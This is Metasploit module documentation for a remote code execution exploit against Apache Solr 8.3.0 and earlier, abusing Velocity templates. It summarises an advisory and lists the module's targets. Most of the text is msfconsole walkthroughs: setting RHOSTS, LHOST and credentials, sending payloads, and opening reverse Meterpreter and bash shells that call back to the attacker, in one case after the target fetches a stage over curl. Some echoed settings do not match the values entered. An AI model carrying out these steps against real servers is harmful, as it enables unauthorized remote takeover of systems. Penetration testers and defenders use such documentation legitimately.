documentation/modules/exploit/multi/http/solr_velocity_rce.md
This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom Velocity template. Currently, this module only supports Solr basic authentication.
From the Tenable advisory
Link: https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability
An attacker could target a vulnerable Apache Solr instance by first identifying a list of Solr core names. Once the core names have been identified, an attacker can send a specially crafted HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity template parameter in a specially crafted Solr request, leading to RCE.
Apache Solr <= 8.3.0
msfconsoleuse exploit/multi/http/solr_velocity_rceset RHOST <target_ip>set RPORT <target_port>set USERNAME <username> (if applicable)set PASSWORD <password> (if applicable)checkset TARGET based on output of checkset PAYLOAD <payload_name> if you want to use other payloadsset LHOST <your_ip>set LPORT <your_port>set VERBOSE true to get verbose outputset TARGETURI <path_to_solr> if target system uses a different path to Apache Solrexploit and let the shells rainPrivileges gained are dependent on the user running Solr. Currently, this module only supports basic auth.
The "Java (in-memory)" target should work on any vulnerable system regardless of OS. It requires that the victim system be able to make HTTP requests to the attack platform.
Windows systems have 3 targets:
PowerShell to get a shell. Payload defaults to windows/meterpreter/reverse_tcpCmdStager to get a shell. Payload defaults to windows/meterpreter/reverse_tcpcmd/windows/generic*nix systems have 2 targets:
cmd/unix/reverse_bash. Output may be returned depending on payload used.CmdStager. Payload defaults to linux/x86/meterpreter/reverse_tcpmsf > use exploit/multi/http/solr_velocity_rce
msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155
RHOSTS => 192.168.137.132
msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/solr_velocity_rce) > set TARGET 2
TARGET => 2
msf exploit(multi/http/solr_velocity_rce) > exploit
[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Found Apache Solr 8.3.0
[*] OS version is Windows Server 2019 amd64 10.0
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[+] Found Powershell at C:\Windows\System32\WindowsPowerShell\v1.0\
[*] Sending stage (180291 bytes) to 192.168.137.155
[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.155:50210) at 2020-03-29 00:04:01 +0800
meterpreter > sysinfo
Computer : 2K19DTCTR
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
gSystem Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
msf > use exploit/multi/http/solr_velocity_rce
msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155
RHOSTS => 192.168.137.132
msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/solr_velocity_rce) > set TARGET 3
TARGET => 3
msf exploit(multi/http/solr_velocity_rce) > exploit
[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Found Apache Solr 8.3.0
[*] OS version is Windows Server 2019 amd64 10.0
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[*] Sending CmdStager payload...
[*] Command Stager progress - 7.05% done (7160/101541 bytes)
[*] Command Stager progress - 14.10% done (14320/101541 bytes)
[*] Command Stager progress - 21.15% done (21480/101541 bytes)
[*] Command Stager progress - 28.21% done (28640/101541 bytes)
[*] Command Stager progress - 35.26% done (35800/101541 bytes)
[*] Command Stager progress - 42.31% done (42960/101541 bytes)
[*] Command Stager progress - 49.36% done (50120/101541 bytes)
[*] Command Stager progress - 56.41% done (57280/101541 bytes)
[*] Command Stager progress - 63.46% done (64440/101541 bytes)
[*] Command Stager progress - 70.51% done (71600/101541 bytes)
[*] Command Stager progress - 77.56% done (78760/101541 bytes)
[*] Command Stager progress - 84.62% done (85920/101541 bytes)
[*] Command Stager progress - 91.67% done (93080/101541 bytes)
[*] Command Stager progress - 98.67% done (100188/101541 bytes)
[*] Sending stage (180291 bytes) to 192.168.137.155
[*] Command Stager progress - 100.00% done (101541/101541 bytes)
[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.155:50211) at 2020-03-29 00:06:01 +0800
meterpreter > sysinfo
Computer : 2K19DTCTR
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
cmd/windows/genericmsf > use exploit/multi/http/solr_velocity_rce
msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155
RHOSTS => 192.168.137.132
msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/solr_velocity_rce) > set TARGET 4
TARGET => 4
msf exploit(multi/http/solr_velocity_rce) > set CMD whoami
CMD => whoami
msf exploit(multi/http/solr_velocity_rce) > exploit
[*] Found Apache Solr 8.3.0
[*] OS version is Windows Server 2019 amd64 10.0
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[+] 2k19dtctr\administrator
[*] Exploit completed, but no session was created.
msf exploit(multi/http/solr_velocity_rce) >
cmd/unix/reverse_bashmsf > use exploit/multi/http/solr_velocity_rce
msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
RHOSTS => 192.168.137.129
msf exploit(multi/http/solr_velocity_rce) > set RPORT 80
RPORT => 80
msf exploit(multi/http/solr_velocity_rce) > set TARGET 0
TARGET => 0
msf exploit(multi/http/solr_velocity_rce) > set USERNAME user
USERNAME => user
msf exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
PASSWORD => j6lzH82e6Jc5
msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/solr_velocity_rce) > exploit
[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Found Apache Solr 8.3.0
[*] OS version is Linux amd64 4.9.0-11-amd64
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[*] Command shell session 17 opened (192.168.137.128:4444 -> 192.168.137.129:48600) at 2020-03-29 00:20:50 +0800
id
uid=999(solr) gid=1002(solr) groups=1002(solr)
cmd/unix/genericmsf > use exploit/multi/http/solr_velocity_rce
msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
RHOSTS => 192.168.137.129
msf exploit(multi/http/solr_velocity_rce) > set RPORT 80
RPORT => 80
msf exploit(multi/http/solr_velocity_rce) > set TARGET 0
TARGET => 0
msf exploit(multi/http/solr_velocity_rce) > set USERNAME user
USERNAME => user
msf exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
PASSWORD => j6lzH82e6Jc5
msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/solr_velocity_rce) > set CMD whoami
CMD => whoami
msf exploit(multi/http/solr_velocity_rce) > exploit
[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Found Apache Solr 8.3.0
[*] OS version is Linux amd64 4.9.0-11-amd64
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[+] solr
[*] Exploit completed, but no session was created.
msf exploit(multi/http/solr_velocity_rce) >
linux/x86/meterpreter/reverse_tcpmsf > use exploit/multi/http/solr_velocity_rce
msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
RHOSTS => 192.168.137.129
msf exploit(multi/http/solr_velocity_rce) > set RPORT 80
RPORT => 80
msf exploit(multi/http/solr_velocity_rce) > set USERNAME user
USERNAME => user
msf exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
PASSWORD => j6lzH82e6Jc5
msf exploit(multi/http/solr_velocity_rce) > set TARGET 1
TARGET => 1
msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/solr_velocity_rce) > exploit
[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Found Apache Solr 8.3.0
[*] OS version is Linux amd64 4.9.0-11-amd64
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[*] Using URL: http://0.0.0.0:8080/PDeRPN1t
[*] Local IP: http://192.168.137.128:8080/PDeRPN1t
[*] Client 192.168.137.129 (curl/7.52.1) requested /PDeRPN1t
[*] Sending payload to 192.168.137.129 (curl/7.52.1)
[*] Sending stage (985320 bytes) to 192.168.137.129
[*] Meterpreter session 18 opened (192.168.137.128:4444 -> 192.168.137.129:48604) at 2020-03-29 00:23:13 +0800
[*] Command Stager progress - 100.00% done (149/149 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.168.137.129
OS : Debian 9.11 (Linux 4.9.0-11-amd64)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >